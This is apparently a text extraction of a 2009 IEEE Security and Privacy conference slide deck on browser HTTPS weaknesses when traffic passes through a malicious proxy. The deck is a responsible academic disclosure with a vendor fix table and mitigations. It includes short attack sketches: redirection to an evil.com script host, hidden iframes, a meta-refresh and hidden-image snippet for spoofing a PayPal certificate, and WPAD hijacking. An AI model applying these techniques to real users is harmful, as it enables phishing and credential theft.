Upload
jeremiah-padilla
View
219
Download
2
Tags:
Embed Size (px)
Citation preview
1IEEE Symposium on Security and Privacy, May 2009IEEE Symposium on Security and Privacy, May 2009
Shuo Chen†, Ziqing Mao† ‡, Yi-Min Wang†, Ming Zhang†
†Microsoft Research ‡Purdue University
May 20th, 2009
2IEEE Symposium on Security and Privacy, May 2009
HTTPS: end-to-end secure protocol for web traffic.
Adversary assumption: MITM (man-in-the-middle). browser HTTPS server
Internetproxy
SSL tunnel
Are today’s browser implementations consistent with this assumption?
3IEEE Symposium on Security and Privacy, May 2009
Key findingA class of browser vulnerabilities (demo) proxy can defeat end-to-end security promised by HTTPS
Vulnerabilities exist in all major browsers
Industry outreachTechnical work finished in summer 2007Paper withheld until this conferenceWorked with all vendors to address the issues
4IEEE Symposium on Security and Privacy, May 2009
TCP/IPTCP/IP
HTTP/HTTPS
Rendering modules
Browser PBP HTTPS server
Unencrypted
SSL tunnel, encrypted
HTTP/HTTPS
5IEEE Symposium on Security and Privacy, May 2009
Key issue: browsers load unencrypted content from proxy in the HTTPS context of the victim server
Attack 1: Proxy’s error responseAttack 2: Proxy’s redirection Attack 3: HTTP-intended pages that are HTTPS loadableAttack 4: Visual context (GUI behavior, no script)
6IEEE Symposium on Security and Privacy, May 2009
<iframe src=“https://bank.com”>
Proxy’s error page: e.g., 502-server-not-found, other 4xx/5xx response;
Script in error page runs in https://bank.com.
browser PBPBankserver
https://bank.com
502:Server not foundhttps://bank.com
7IEEE Symposium on Security and Privacy, May 2009
browser PBP
bank.com server
https://bank.com
evil.com server
<script src=“https://js. bank.com/foo.js”>
https://js.bank.com
HTTP 302: redirection to https://evil.com
https://evil.com
Script will run in the context of https://bank.com
8IEEE Symposium on Security and Privacy, May 2009
sensitive
Many websites provide both HTTP and HTTPS services
Sensitive pages, e.g. checkout HTTPS only
Non-sensitive pages, e.g., merchandise Intended for HTTP access
However, non-sensitive pages are often accessible through HTTPS as well!.
What’s wrong with HPIHSL pages?They often import scripts through HTTP
The scripts will run in the HTTPS context.
Non-sensitive
HTTP scripts
HPIH
SL
9IEEE Symposium on Security and Privacy, May 2009
Browsers warn about HTTP resource in HTTPS contexts, don’t they?
The detection logic is only to determine the address bar’s appearance
Address bar only concerns top level page, so …
10IEEE Symposium on Security and Privacy, May 2009
Hidden iframe:
HTTPS for an HPIHSL page
http://resources.jcpenny.com/
foo.jsAttack script to run in the HTTPS
context
Top level: HTTP
Using an HTTPS iframe in an HTTP top level page.
11IEEE Symposium on Security and Privacy, May 2009
Very easy to find HPIHSL pages that import scripts
The paper shows 12 websites having this problem.
These HTTPS domains are not trustworthy.They cover a wide range
Online shopping sites
Banks, credit card companies
Open source projects management site
Top computer science departments
Even the home domain of a leading certificate authority
12IEEE Symposium on Security and Privacy, May 2009
In attack 1, script in proxy’s error page runs in the HTTPS context. (all browsers)
This attackNo script, only static HTMLDue to GUI behavior
IE, Opera and Chrome display a certificate on the GUI as long as it is in the certificate cache.
13IEEE Symposium on Security and Privacy, May 2009
Schedule a one-second timer for refreshing the page.<head><meta HTTP-EQUIV=“Refresh” CONTENT=“1; URL=https://www.paypal.com”></head>
Before the timer is expired, cache a PayPal certificate <img src=“https://www.paypal.com/a.jpg” style=“display:none”>
a response page
Get a.jpg from the real
serverthe phishing page (5xx)
A perfect GUI spoofing attackFresh browser, single tab, address bar input
14IEEE Symposium on Security and Privacy, May 2009
15IEEE Symposium on Security and Privacy, May 2009
Proxies are used in many environmentsCorporate and university networks
Hospitals, hotels
Third-party free proxies
Due to PBP issues, security of HTTPS communication depends on proxy’s integrity
Is proxy infected by viruses, hijacked by attackers or configured by malicious insiders?
16IEEE Symposium on Security and Privacy, May 2009
All these attacks work as long as(1) Attacker can sniff your machine at the link
layerFor HTTPS, you need to assume this.
(2) The browser has its proxy capability ONWPAD: Web Proxy Auto Discovery
PAC script: Proxy Auto Config script
Manual configuration
17IEEE Symposium on Security and Privacy, May 2009
GET /wpad.dat
return PBP_cfg
GET /wpad.dat
return goodProxy_cfg
attacker
Our test bedProxy required for web traffic to the Internet
WPAD (default), PAC-script-config or manual-config
Tested on Ethernet
Tested on open wireless network
18IEEE Symposium on Security and Privacy, May 2009
IE 8 (since beta 2)
Firefox 3.0.10
Safari 3.2.2 (or before)
Opera sinceDec. 2007
Chrome1.0.154.53
Error-response issue
Fixed Fixed Fixed Fixed Fixed
Redirection issue
N/A Fixed Fixed Fixed N/A
HPIHSL issue fix suggested for next version
Fix proposed Acknowledged Acknowledged
Acknowledged
Cached certificate issue
Fixed N/A N/A Fixed Fixed
Besides point fixes, how can we systematically prevent (or find) these bugs?Future PBP issues
19IEEE Symposium on Security and Privacy, May 2009
Not a fundamental “solution”HTTPS security should not depend on the network. However, it is worthwhile to have mitigations
Some issues not patched
New issues found in the future
MitigationsWireless router: use WPA (WiFi Protected Access)Corporate network: deploy IPSec on many types of servers
Not only web servers, but DNS, DHCP, PAC servers
Travelling employees: secure-VPN to your corporate networks
20IEEE Symposium on Security and Privacy, May 2009
The PBP adversaryTargeting the rendering modules
Encrypted/unencrypted contents confused
TCP/IP
HTTP/HTTPS
Rendering modules
Developers of rendering modules need to deal with MITM
HTTPS layer not masking MITM for rendering modules.
Beyond HTTPSOther end-to-end protocols: Kerberos, IPSec, etc
E.g., HTTP over IPSec, using Kerberos authenticationWhat do you want to achieve if a proxy is in between?
21IEEE Symposium on Security and Privacy, May 2009
HTTPS is flawed.
We argue that many proxies are not secure enough to tunnel HTTPS.
We advocate link layer security.
In addition to browser issues, we also show issues in WPAD, etc.
22IEEE Symposium on Security and Privacy, May 2009
A free web service for timestamping research ideas
Why: some research contributions cannot be published immediately, e.g., due to responsible disclosure policy.What: OCCUR gives your idea a timestamp from VeriSignDetails: search for “Microsoft OCCUR” or ask me offline
http://research.microsoft.com/en-us/projects/occur/